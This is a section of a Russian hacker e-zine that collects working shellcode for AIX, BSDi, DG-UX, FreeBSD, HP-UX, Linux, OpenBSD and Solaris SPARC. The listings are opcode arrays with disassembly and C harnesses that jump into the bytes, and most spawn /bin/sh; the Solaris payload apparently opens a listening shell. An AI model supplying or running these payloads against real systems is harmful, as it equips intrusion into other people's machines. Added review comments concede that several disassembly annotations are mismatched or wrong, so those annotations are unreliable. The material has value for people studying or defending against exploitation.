+-----------------------------------------------------------------------------------------------------------------------------------------------[CP #2]----+
  _|_| _|_|         _|  _|    _|_|_|
_|     _|  _|     _|_|_|_|_|  _|  _|
_| ODE _|_|         _|  _|      _|  
_|     _| IMPS    _|_|_|_|_|  _|    
    _|_| _|           _|  _|    _|_|_|  
+-------------------------------------------------------------------------------------------------------------------------------------------------------------+
+-----------------------------------------------[2x05 5h3llC0d35 (/home/cp2/hack/shellcodes)]-------------------------------------------+
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|

Здесь представлены некоторые шеллкоды для разных систем. Большое количество кодов вы сможете найти в архиве [files/shellcodes.tgz] журнала.



Начнем с системы AIX.

Шеллкод Георгия Гунински (Georgi Guninski), вызывающий /bin/sh:
/*
 * AIX shellcode (Georgi Guninski): one 32-bit instruction word per
 * element, with a final 0x0 element.  The word-by-word disassembly is
 * given in the text right after this listing.
 */
unsigned int code[]={
  0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
  0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
  0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
  0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
  0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
  0x7c0903a6 , 0x4e800420, 0x0
};
Теперь комментарии на асме:
  7c0802a6        mfspr   r0,LR
  9421fbb0        stu     SP,-1104(SP) --получаем стек
  90010458        st      r0,1112(SP)
  3c60f019        cau     r3,r0,0xf019 --CTR
  60632c48        lis     r3,r3,11336  --CTR
  90610440        st      r3,1088(SP)
  3c60d002        cau     r3,r0,0xd002 --TOC
  60634c0c        lis     r3,r3,19468  --TOC
  90610444        st      r3,1092(SP)
  3c602f62        cau     r3,r0,0x2f62 --'/bin/sh\x01'
  6063696e        lis     r3,r3,26990
  90610438        st      r3,1080(SP)
  3c602f73        cau     r3,r0,0x2f73
  60636801        lis     r3,r3,26625
  3863ffff        addi    r3,r3,-1
  9061043c        st      r3,1084(SP) --умираем с 0
  30610438        lis     r3,SP,1080
  7c842278        xor     r4,r4,r4    --argv=NULL
  80410440        lwz     RTOC,1088(SP)
  80010444        lwz     r0,1092(SP) --jump
  7c0903a6        mtspr   CTR,r0
  4e800420        bctr              --jump




Далее — система BSDi.
/*
 * BSDi/x86 shellcode.  The author's disassembly of these bytes follows
 * the harness below.  Per that listing the code stores into memory
 * addressed from %esi (the mov %bl,...(%esi) instructions), i.e. it
 * appears to patch its own bytes at run time — which is why the shell
 * path is carried as upper-case "BIN/SH" — so it needs a region that is
 * both writable and executable.  Not verified here beyond the listing.
 */
char code[] =
  "\xeb\x57\x5e\x31\xdb\x83\xc3\x08\x83\xc3\x02\x88\x5e"
  "\x26\x31\xdb\x83\xc3\x23\x83\xc3\x23\x88\x5e\xa8\x31"
  "\xdb\x83\xc3\x26\x83\xc3\x30\x88\x5e\xc2\x31\xc0\x88"
  "\x46\x0b\x89\xf3\x83\xc0\x05\x31\xc9\x83\xc1\x01\x31"
  "\xd2\xcd\x80\x89\xc3\x31\xc0\x83\xc0\x04\x31\xd2\x88"
  "\x56\x27\x89\xf1\x83\xc1\x0c\x83\xc2\x1b\xcd\x80\x31"
  "\xc0\x83\xc0\x06\xcd\x80\x31\xc0\x83\xc0\x01\xcd\x80"
  "BIN/SH";

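/*
 * Harness for the BSDi listing above: reports the payload length, then
 * transfers control into the `code` array by casting it to a function
 * pointer.  Needs <stdio.h> and <string.h>, which the listing omits
 * (the original relied on implicit declarations and an implicit-int
 * main(), both removed in C99).  The indirect call only works where the
 * data segment is executable; under NX/W^X it faults, and this
 * cast-data-to-function-and-call shape is one that static analysis
 * commonly flags.
 */
int main(void)
{
  int (*f)(void) = (int (*)(void)) code;

  /* strlen() returns size_t, so %zu; %d with a size_t argument is UB. */
  printf("BSDi old shellcode, %zu bytes\n", strlen(code));
  (*f)();
  return 0;
}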

Комментарии (дизассемблированный листинг):
  jmp    0x57
  pop    %esi
  xor    %ebx,%ebx
  add    $0x8,%ebx
  add    $0x2,%ebx
  mov    %bl,0x26(%esi)
  xor    %ebx,%ebx
  add    $0x23,%ebx
  add    $0x23,%ebx
  mov    %bl,0xffffffa8(%esi)
  xor    %ebx,%ebx
  add    $0x26,%ebx
  add    $0x30,%ebx
  mov    %bl,0xffffffc2(%esi)
  xor    %eax,%eax
  mov    %al,0xb(%esi)
  mov    %esi,%ebx
  add    $0x5,%eax
  xor    %ecx,%ecx
  add    $0x1,%ecx
  xor    %edx,%edx
  int    $0x80
  mov    %eax,%ebx
  xor    %eax,%eax
  add    $0x4,%eax
  xor    %edx,%edx
  mov    %dl,0x27(%esi)
  mov    %esi,%ecx
  add    $0xc,%ecx
  add    $0x1b,%edx
  int    $0x80
  xor    %eax,%eax
  add    $0x6,%eax
  int    $0x80
  xor    %eax,%eax
  add    $0x1,%eax
  int    $0x80
  .string "BIN/SH"



Система DG-UX.

Code by Lamont Granquist:
/*
 * DG-UX listing (Lamont Granquist): 32-bit instruction words.
 * NOTE(review): the inline mnemonics (subq, stl, stq, ldil, call_pal,
 * $NN registers) read as DEC Alpha assembly, which is not a platform
 * DG-UX ran on as far as I know; several words (0x4b84169c,
 * 0x465c0812, 0x22528cd1) carry no annotation, and some annotations do
 * not sit beside the word they describe (0xffffffff cannot encode
 * call_pal).  Treat the comments as the author's notes, not a verified
 * disassembly.  The trailing "/sh\0" is not part of the array.
 */
int rawcode[] = {
  0x2230fec4,              /* subq $16,0x13c,$17  */
  0x47ff0412,              /* clr $18             */
  0x42509532,              /* subq $18, 0x84      */
  0x239fffff,              /* xor $18, 0xffffffff, $18  */
  0x4b84169c,
  0x465c0812,
  0xb2510134,              /* stl $18, 0x134($17) */
  0x265cff98,              /* lda $18, 0xff978cd0 */
  0x22528cd1,
  0x465c0812,              /* xor $18, 0xffffffff, $18  */
  0xb2510140,              /* stl $18, 0x140($17) */
  0xb6110148,              /* stq $16,0x148($17)  */
  0xb7f10150,              /* stq $31,0x150($17)  */
  0x22310148,              /* addq $17,0x148,$17  */
  0x225f013a,              /* ldil $18,0x13a    */
  0x425ff520,              /* subq $18,0xff,$0    */
  0x47ff0412,              /* clr $18     */
  0xffffffff,              /* call_pal 0x83   */
  0xd21fffed,              /* bsr $16,$l1    ENTRY      */
  0x6e69622f,              /* .ascii "/bin"   */
  /* .ascii "/sh\0" is generated */
};



BSD codes.

23 байта:
/*
 * FreeBSD/x86 shellcode, 23 bytes; each comment is the author's
 * disassembly of the bytes on that line.  The two pushes place
 * "//bin/sh" on the stack, preceded by the pushed %edx as terminator
 * (cdq leaves %edx zero only while %eax is non-negative — an assumption
 * the code makes).  No NUL byte appears in the string, so strlen() in
 * the harness below reports the full length.
 */
char fbsd_execve[]=
  "\x99"                  /* cdq      */
  "\x52"                  /* push %edx            */
  "\x68\x6e\x2f\x73\x68"  /* push $0x68732f6e     */
  "\x68\x2f\x2f\x62\x69"  /* push $0x69622f2f   */
  "\x89\xe3"              /* movl %esp,%ebx   */
  "\x51"                  /* push %ecx - or %edx :) */
  "\x52"                  /* push %edx - or %ecx :) */
  "\x53"                  /* push %ebx      */
  "\x53"                  /* push %ebx      */
  "\x6a\x3b"              /* push $0x3b     */
  "\x58"                  /* pop %eax     */
  "\xcd\x80";             /* int $0x80      */

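/*
 * Length-only harness for fbsd_execve: prints strlen() of the buffer and
 * exits.  `run` is set up but never called in the listing, so this
 * program does not execute the payload; the pointer is kept (and voided)
 * so the listing's intent stays visible without an unused-variable
 * warning.  Needs <stdio.h> and <string.h>, which the listing omits.
 */
int main(void)
{
  void (*run)(void) = (void (*)(void)) fbsd_execve;
  (void)run;

  /* %zu: strlen() returns size_t; %d with a size_t argument is UB. */
  printf("%zu bytes \n", strlen(fbsd_execve));
  return 0;
}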
25 байт:
/*
 * FreeBSD/x86 variant, 25 bytes.  The instruction-by-instruction
 * assembly is given in the text below ("Asm code"); the string contains
 * no NUL byte, so strlen() in the harness reports all 25.
 */
char sc[]=
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
"\xb0\x3b\x50\xcd\x80";

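/*
 * Harness for `sc`: prints the payload length, then calls into the array
 * through a function pointer.  Needs <stdio.h> and <string.h>, which the
 * listing omits.  The call only succeeds where the data segment is
 * executable; on an NX/W^X system it faults at the first instruction.
 */
int main(void)
{
  void (*s)(void) = (void (*)(void)) sc;

  /* %zu: strlen() returns size_t; %d with a size_t argument is UB. */
  printf("len : %zu\n", strlen(sc));
  s();
  return 0;
}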
Asm code:
                     
xorl %eax, %eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %ebx
pushl %eax
pushl %esp
pushl %ebx
movb $0x3b,%al
pushl %eax
int $0x80    



HP-UX

Code by K2 (exec /bin/sh)
/*
 * HP-UX shellcode by K2.  `u_char` is the BSD typedef for unsigned char
 * (from <sys/types.h>), not a standard C type, so the listing needs that
 * header or a plain `unsigned char`.  The path "/bin/sh" is embedded in
 * the last line, followed by a 0xff byte.
 */
u_char shellcode[] =
  "\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40"
  "\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"
  "\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff";    



Linux x86

23 байта:
/*
 * Linux/x86 shellcode, 23 bytes; the comments are the author's
 * disassembly.  Two of them were split across the wrong byte groups:
 * \x59 is pop %ecx, \x6a\x0b is push $0x0b and \x58 is pop %eax —
 * the comments on those two lines are corrected accordingly.
 * NOTE(review): GCC predefines `linux` as 1 in its default GNU dialect,
 * so `char linux[]` will not compile unless a strict -std= mode is used
 * or the array (and the harness below) is renamed.
 */
char linux[]=
  "\x99"      /* cdq              */
  "\x52"      /* push %edx        */
  "\x68\x2f\x2f\x73\x68"  /* push $0x68732f2f */
  "\x68\x2f\x62\x69\x6e"  /* push $0x6e69622f */
  "\x89\xe3"      /* mov %esp,%ebx    */
  "\x52"      /* push %edx        */
  "\x54"      /* push %esp        */
  "\x54"      /* push %esp        */
  "\x59\x6a"      /* pop %ecx ; push (imm8 on next line) */
  "\x0b\x58"      /* $0x0b ; pop %eax */
  "\xcd\x80";     /* int $0x80        */

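/*
 * Harness for the Linux listing: prints the payload length, then calls
 * into the `linux` array through a function pointer.  Needs <stdio.h>
 * and <string.h>, which the listing omits.
 * NOTE(review): `linux` is a predefined macro (=1) in GCC's default GNU
 * dialect, so this file only compiles under a strict -std= mode or after
 * renaming the array.  The call also requires an executable data
 * segment; under NX/W^X it faults immediately.
 */
int main(void)
{
  void (*run)(void) = (void (*)(void)) linux;

  /* %zu: strlen() returns size_t; %d with a size_t argument is UB. */
  printf("%zu bytes \n", strlen(linux));
  run();
  return 0;
}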



OpenBSD

также 23 байта:
/*
 * OpenBSD/x86 shellcode, 23 bytes; the comments are the author's
 * disassembly.  Apart from the push %esp / push %ebx sequence this is
 * the same byte layout as the FreeBSD listing above (same "//bin/sh"
 * pushes, same push $0x3b ; pop %eax ; int $0x80 tail).
 */
char open_bsd[]=
  "\x99"      /* cdq              */
  "\x52"      /* push %edx        */
  "\x68\x6e\x2f\x73\x68"  /* push $0x68732f6e */
  "\x68\x2f\x2f\x62\x69"  /* push $0x69622f2f */
  "\x89\xe3"      /* mov %esp,%ebx    */
  "\x52"      /* push %edx        */
  "\x54"      /* push %esp        */
  "\x53"      /* push %ebx        */
  "\x53"      /* push %ebx        */
  "\x6a\x3b"      /* push $0x3b       */
  "\x58"      /* pop %eax         */
  "\xcd\x80";     /* int $0x80        */

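/*
 * Harness for the OpenBSD listing: prints the payload length, then calls
 * into the `open_bsd` array through a function pointer.  Needs <stdio.h>
 * and <string.h>, which the listing omits.  The call requires an
 * executable data segment; OpenBSD's W^X enforcement makes it fault
 * on any modern release.
 */
int main(void)
{
  void (*run)(void) = (void (*)(void)) open_bsd;

  /* %zu: strlen() returns size_t; %d with a size_t argument is UB. */
  printf("%zu bytes\n", strlen(open_bsd));
  run();
  return 0;
}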



Solaris — SPARC
/*
 * Solaris/SPARC shellcode: one 32-bit instruction per line, with the
 * author's disassembly alongside (each `ta 0x8` is a system-call trap).
 * The closing `;` sits on its own line after the last string literal.
 * NOTE(review): this array has the same name as the HP-UX one above, so
 * the two listings cannot be pasted into a single translation unit.
 */
char shellcode[] =
  "\xa0\x23\xa0\x10"  /* sub      %sp, 16, %l0      */
  "\xae\x23\x80\x10"  /* sub      %sp, %l0, %l7     */
  "\xee\x23\xbf\xec"  /* st       %l7, [%sp - 20]     */
  "\x82\x05\xe0\xd6"  /* add      %l7, 214, %g1     */
  "\x90\x25\xe0\x0e"  /* sub      %l7, 14, %o0      */
  "\x92\x25\xe0\x0e"  /* sub      %l7, 14, %o1      */
  "\x94\x1c\x40\x11"  /* xor      %l1, %l1, %o2     */
  "\x96\x1c\x40\x11"  /* xor      %l1, %l1, %o3     */
  "\x98\x25\xe0\x0f"  /* sub      %l7, 15, %o4      */
  "\x91\xd0\x38\x08"  /* ta       0x8       */
  "\xa4\x1a\x80\x08"  /* xor      %o2, %o0, %l2     */
  "\xd2\x33\xbf\xf0"  /* sth      %o1, [%sp - 16]     */
  "\xac\x10\x27\xd1"  /* mov      2001, %l6     */
  "\xec\x33\xbf\xf2"  /* sth      %l6, [%sp - 14]     */
  "\xc0\x23\xbf\xf4"  /* st       %g0, [%sp - 12]     */
  "\x82\x05\xe0\xd8"  /* add      %l7, 216, %g1     */
  "\x90\x1a\xc0\x12"  /* xor      %o3, %l2, %o0     */
  "\x92\x1a\xc0\x10"  /* xor      %o3, %l0, %o1     */
  "\x94\x1a\xc0\x17"  /* xor      %o3, %l7, %o2     */
  "\x91\xd0\x38\x08"  /* ta       0x8       */
  "\x82\x05\xe0\xd9"  /* add      %l7, 217, %g1     */
  "\x90\x1a\xc0\x12"  /* xor      %o3, %l2, %o0     */
  "\x92\x25\xe0\x0b"  /* sub      %l7, 11, %o1      */
  "\x91\xd0\x38\x08"  /* ta       0x8       */
  "\x82\x05\xe0\xda"  /* add      %l7, 218, %g1     */
  "\x90\x1a\xc0\x12"  /* xor      %o3, %l2, %o0     */
  "\x92\x1a\xc0\x10"  /* xor      %o3, %l0, %o1     */
  "\x94\x23\xa0\x14"  /* sub      %sp, 20, %o2      */
  "\x91\xd0\x38\x08"  /* ta       0x8       */
  "\xa6\x1a\xc0\x08"  /* xor      %o3, %o0, %l3     */
  "\x82\x05\xe0\x2e"  /* add      %l7, 46, %g1      */
  "\x90\x1a\xc0\x13"  /* xor      %o3, %l3, %o0     */
  "\x92\x25\xe0\x07"  /* sub      %l7, 7, %o1     */
  "\x94\x1b\x80\x0e"  /* xor      %sp, %sp, %o2     */
  "\x91\xd0\x38\x08"  /* ta       0x8       */
  "\x90\x1a\xc0\x13"  /* xor      %o3, %l3, %o0     */
  "\x92\x25\xe0\x07"  /* sub      %l7, 7, %o1     */
  "\x94\x02\xe0\x01"  /* add      %o3, 1, %o2     */
  "\x91\xd0\x38\x08"  /* ta       0x8       */
  "\x90\x1a\xc0\x13"  /* xor      %o3, %l3, %o0     */
  "\x92\x25\xe0\x07"  /* sub      %l7, 7, %o1     */
  "\x94\x02\xe0\x02"  /* add      %o3, 2, %o2     */
  "\x91\xd0\x38\x08"  /* ta       0x8       */
  "\x90\x1b\x80\x0e"  /* xor      %sp, %sp, %o0     */
  "\x82\x02\xe0\x17"  /* add      %o3, 23, %g1      */
  "\x91\xd0\x38\x08"  /* ta       0x8       */
  "\x21\x0b\xd8\x9a"  /* sethi    %hi(0x2f626800), %l0    */
  "\xa0\x14\x21\x6e"  /* or       %l0, 0x16e, %l0 ! 0x2f62696e  */
  "\x23\x0b\xdc\xda"  /* sethi    %hi(0x2f736800), %l1    */
  "\x90\x23\xa0\x10"  /* sub      %sp, 16, %o0      */
  "\x92\x23\xa0\x08"  /* sub      %sp, 8, %o1     */
  "\x94\x1b\x80\x0e"  /* xor      %sp, %sp, %o2     */
  "\xe0\x3b\xbf\xf0"  /* std      %l0, [%sp - 16]     */
  "\xd0\x23\xbf\xf8"  /* st       %o0, [%sp - 8]      */
  "\xc0\x23\xbf\xfc"  /* st       %g0, [%sp - 4]      */
  "\x82\x02\xe0\x3b"  /* add      %o3, 59, %g1      */
  "\x91\xd0\x38\x08"  /* ta       0x8       */
  "\x90\x1b\x80\x0e"  /* xor      %sp, %sp, %o0     */
  "\x82\x02\xe0\x01"  /* add      %o3, 1, %g1     */
  "\x91\xd0\x38\x08"  /* ta       0x8       */
;

На этом закончим. Повторюсь: больше шеллкодов под разные системы вы можете найти в архиве [files/shellcodes.tgz] журнала.